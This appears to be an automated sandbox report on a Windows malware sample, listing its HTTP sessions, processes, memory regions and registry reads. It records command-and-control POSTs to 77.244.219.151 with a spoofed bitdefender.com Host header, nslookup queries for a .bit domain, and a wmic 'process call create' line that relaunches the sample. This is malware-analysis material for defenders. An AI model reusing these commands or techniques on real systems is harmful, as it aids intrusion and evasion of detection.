User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 14 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 6
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 272
Data Received 552
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eighge, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighge True 1
Fn
Data
Read Response size = 204798, size_out = 552 True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 6
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 296
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = store?steepl=aiplau&sauf=iesay, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/store?steepl=aiplau&sauf=iesay True 1
Fn
Data
Read Response size = 204798, size_out = 0 True 1
Fn
Close Session - True 6
Fn
Process #11: nslookup.exe
8 17
»
Information Value
ID #11
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:14, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
»
Information Value
PID 0xdc4
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x DC8
0x DF4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00070000 0x00086fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000090000 0x00090000 0x0408ffff Pagefile Backed Memory - True False False -
private_0x0000000004090000 0x04090000 0x04091fff Private Memory Readable, Writable True False False -
private_0x0000000004090000 0x04090000 0x04093fff Private Memory Readable, Writable True False False -
private_0x00000000040a0000 0x040a0000 0x040dffff Private Memory Readable, Writable True False False -
private_0x00000000040e0000 0x040e0000 0x0411ffff Private Memory Readable, Writable True False False -
private_0x0000000004120000 0x04120000 0x04121fff Private Memory Readable, Writable True False False -
private_0x0000000004130000 0x04130000 0x0416ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004170000 0x04170000 0x04170fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004180000 0x04180000 0x04180fff Private Memory Readable, Writable True False False -
private_0x0000000004190000 0x04190000 0x0419ffff Private Memory Readable, Writable True False False -
private_0x00000000041a0000 0x041a0000 0x041dffff Private Memory Readable, Writable True False False -
private_0x00000000041e0000 0x041e0000 0x041e0fff Private Memory Readable, Writable True False False -
private_0x0000000004200000 0x04200000 0x043fffff Private Memory Readable, Writable True False False -
locale.nls 0x04400000 0x044bdfff Memory Mapped File Readable False False False -
imm32.dll 0x044c0000 0x044e9fff Memory Mapped File Readable False False False -
private_0x0000000004590000 0x04590000 0x0468ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004690000 0x04690000 0x04817fff Pagefile Backed Memory Readable True False False -
private_0x0000000004840000 0x04840000 0x0484ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004850000 0x04850000 0x049d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000049e0000 0x049e0000 0x05ddffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005de0000 0x05de0000 0x061dafff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x061e0000 0x06516fff Memory Mapped File Readable False False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f220000 0x6f22afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f230000 0x6f243fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f250000 0x6f265fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f270000 0x6f281fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007eac0000 0x7eac0000 0x7ebbffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ebc0000 0x7ebc0000 0x7ebe2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = x2vS1cum True 1
Fn
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #13: nslookup.exe
8 17
»
Information Value
ID #13
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:47, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:36
OS Process Information
»
Information Value
PID 0xee4
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x EE8
0x F04
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00070000 0x00086fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000090000 0x00090000 0x0408ffff Pagefile Backed Memory - True False False -
private_0x0000000004090000 0x04090000 0x04091fff Private Memory Readable, Writable True False False -
private_0x0000000004090000 0x04090000 0x04093fff Private Memory Readable, Writable True False False -
private_0x00000000040a0000 0x040a0000 0x040dffff Private Memory Readable, Writable True False False -
private_0x00000000040e0000 0x040e0000 0x0411ffff Private Memory Readable, Writable True False False -
private_0x0000000004120000 0x04120000 0x04121fff Private Memory Readable, Writable True False False -
locale.nls 0x04130000 0x041edfff Memory Mapped File Readable False False False -
pagefile_0x00000000041f0000 0x041f0000 0x041f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004200000 0x04200000 0x043fffff Private Memory Readable, Writable True False False -
private_0x0000000004400000 0x04400000 0x0443ffff Private Memory Readable, Writable True False False -
private_0x0000000004440000 0x04440000 0x0447ffff Private Memory Readable, Writable True False False -
imm32.dll 0x04480000 0x044a9fff Memory Mapped File Readable False False False -
private_0x0000000004480000 0x04480000 0x04480fff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x04490fff Private Memory Readable, Writable True False False -
private_0x00000000044b0000 0x044b0000 0x044bffff Private Memory Readable, Writable True False False -
private_0x0000000004500000 0x04500000 0x0450ffff Private Memory Readable, Writable True False False -
private_0x0000000004560000 0x04560000 0x0465ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004660000 0x04660000 0x047e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000047f0000 0x047f0000 0x04970fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004980000 0x04980000 0x05d7ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005d80000 0x05d80000 0x0617afff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x06180000 0x064b6fff Memory Mapped File Readable False False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x6f440000 0x6f44afff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x6f450000 0x6f463fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x6f470000 0x6f485fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x6f490000 0x6f4a1fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e480000 0x7e480000 0x7e57ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e580000 0x7e580000 0x7e5a2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = x2vS1cum True 1
Fn
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
Fn
UDP Sessions (3)
»
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #3
»
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Fn
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #15: wmic.exe
15 0
»
Information Value
ID #15
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:53, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:30
OS Process Information
»
Information Value
PID 0x588
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 580
0x C08
0x 6A4
0x C40
0x C0C
0x C10
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00021fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00044fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x000f1fff Private Memory Readable, Writable True False False -
locale.nls 0x00100000 0x001bdfff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x00401fff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x00443fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000460000 0x00460000 0x00460fff Pagefile Backed Memory Readable True False False -
private_0x0000000000470000 0x00470000 0x00473fff Private Memory Readable, Writable True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000490000 0x00490000 0x00490fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x0059ffff Private Memory Readable, Writable True False False -
msxml3r.dll 0x005a0000 0x005a0fff Memory Mapped File Readable False False False -
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x0062ffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x005dffff Private Memory - True False False -
imm32.dll 0x005e0000 0x00609fff Memory Mapped File Readable False False False -
wmic.exe.mui 0x005e0000 0x005effff Memory Mapped File Readable False False False -
private_0x00000000005f0000 0x005f0000 0x005f0fff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x00600fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000610000 0x00610000 0x00610fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000610000 0x00610000 0x00613fff Pagefile Backed Memory Readable True False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory Readable, Writable True False False -
private_0x0000000000630000 0x00630000 0x0066ffff Private Memory Readable, Writable True False False -
private_0x0000000000670000 0x00670000 0x00670fff Private Memory Readable, Writable True False False -
private_0x0000000000680000 0x00680000 0x00680fff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x0069ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x006a0000 0x009d6fff Memory Mapped File Readable False False False -
ole32.dll 0x009e0000 0x00ac9fff Memory Mapped File Readable False False False -
private_0x00000000009e0000 0x009e0000 0x00b8ffff Private Memory Readable, Writable True False False -
private_0x00000000009e0000 0x009e0000 0x00afffff Private Memory Readable, Writable True False False -
private_0x00000000009e0000 0x009e0000 0x00a6ffff Private Memory Readable, Writable True False False -
private_0x00000000009e0000 0x009e0000 0x00a4ffff Private Memory Readable, Writable True False False -
private_0x00000000009e0000 0x009e0000 0x00a1ffff Private Memory Readable, Writable True False False -
private_0x0000000000a40000 0x00a40000 0x00a4ffff Private Memory Readable, Writable True False False -
private_0x0000000000a60000 0x00a60000 0x00a6ffff Private Memory Readable, Writable True False False -
private_0x0000000000a70000 0x00a70000 0x00aaffff Private Memory Readable, Writable True False False -
private_0x0000000000ab0000 0x00ab0000 0x00aeffff Private Memory Readable, Writable True False False -
private_0x0000000000af0000 0x00af0000 0x00afffff Private Memory Readable, Writable True False False -
private_0x0000000000b00000 0x00b00000 0x00b3ffff Private Memory Readable, Writable True False False -
private_0x0000000000b40000 0x00b40000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x0000000000b80000 0x00b80000 0x00b8ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00b90000 0x00c6ffff Memory Mapped File Readable False False False -
wmic.exe 0x00c70000 0x00cd3fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000ce0000 0x00ce0000 0x04cdffff Pagefile Backed Memory - True False False -
private_0x0000000004ce0000 0x04ce0000 0x050dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000050e0000 0x050e0000 0x05267fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005270000 0x05270000 0x053f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005400000 0x05400000 0x067fffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000006800000 0x06800000 0x068bbfff Pagefile Backed Memory Readable True False False -
private_0x00000000068c0000 0x068c0000 0x068fffff Private Memory Readable, Writable True False False -
private_0x0000000006900000 0x06900000 0x0693ffff Private Memory Readable, Writable True False False -
